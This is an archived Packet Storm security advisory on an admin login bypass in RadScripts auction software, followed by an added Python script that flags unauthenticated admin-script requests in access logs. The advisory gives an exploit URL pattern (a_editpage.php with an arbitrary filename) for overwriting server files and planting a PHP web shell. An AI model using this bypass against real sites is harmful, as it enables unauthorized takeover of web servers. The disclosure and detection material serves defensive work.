
radscripts.txt

Date: 26 Jul 2006 00:00:00 | Reported by: INVENT | Type: packetstorm | Source: packetstormsecurity.com

The RadScripts auction products RadBids Gold, RadLance Gold and RadNics Gold contain an admin login bypass vulnerability. The exploit allows overwriting files on the server, including uploading a PHP web shell.

Code
`Products: RadBids Gold, RadLance Gold, RadNics Gold auction products  
  
Vendor: RadScripts  
  
URL: http://www.radscripts.com/  
  
VULNERABILITY CLASS: Admin login bypass  
  
[Product Description]  
  
RadBids was designed to give you all the tools needed to rapidly deploy an ebay style auction web site solution. Our php auction software is simple to deploy and easy to manage. From a web-based administrative panel one can manage all aspects of the auction software including categories, users, financial transactions and every aspect of the auction software with a few clicks of the mouse.  
  
[Summary]  
  
An attacker can bypass the RadScripts Auction Software admin login by entering the direct URL of an admin script.  
  
[Exploit]  
  
http://target.xxx/[product_home]/admin/a_[admin_action_file]  
  
For example:  
http://target.xxx/[product_home]/admin/a_editpage.php?filename=[arbitrary_file]  
  
This can be used to overwrite any file on the server that has write permissions on it,  
for example to upload a PHP web shell.  
  
[Credits]  
  
INVENT`
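
The following detection sketch is an added example, not part of the original advisory or the vendor's code. It scans web access logs for admin action scripts (`/admin/a_*.php`, the pattern given above) that were served to clients with no earlier login request. The combined log format, the login script path `/admin/login.php`, and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Admin action scripts follow the /admin/a_<name>.php pattern from the advisory.
ADMIN_SCRIPT_RE = re.compile(r"/admin/a_[^/]+\.php$")
# ASSUMPTION: hypothetical login script path; set it to the deployment's real one.
LOGIN_SUFFIX = "/admin/login.php"


def find_unauthenticated_admin_hits(lines, login_suffix=LOGIN_SUFFIX):
    """Return served admin-script requests from clients with no earlier login."""
    logged_in = set()  # client IPs already seen submitting the login form
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        status = int(m["status"])
        if m["method"] == "POST" and url.path.endswith(login_suffix) and status < 400:
            logged_in.add(m["ip"])
            continue
        served = 200 <= status < 400
        if served and ADMIN_SCRIPT_RE.search(url.path) and m["ip"] not in logged_in:
            findings.append({
                "ip": m["ip"],
                "path": url.path,
                # a_editpage.php takes the file to edit in ?filename=
                "filename": parse_qs(url.query).get("filename", [None])[0],
            })
    return findings


# Constructed sample log (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Jul/2006:10:00:01 +0000] "POST /auction/admin/login.php HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [26/Jul/2006:10:00:09 +0000] "GET /auction/admin/a_editpage.php?filename=about.html HTTP/1.1" 200 812 "-" "-"',
    '192.0.2.44 - - [26/Jul/2006:10:02:11 +0000] "GET /auction/admin/a_editpage.php?filename=help.html HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.44 - - [26/Jul/2006:10:02:15 +0000] "GET /auction/index.php HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.45 - - [26/Jul/2006:10:03:00 +0000] "GET /auction/admin/a_editpage.php HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_unauthenticated_admin_hits(SAMPLE_LOG):
        print(hit)
```

The heuristic keys on client IP and cannot see session state or whether a login actually succeeded, so treat each hit as a lead to review alongside file modification times rather than as proof of compromise.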
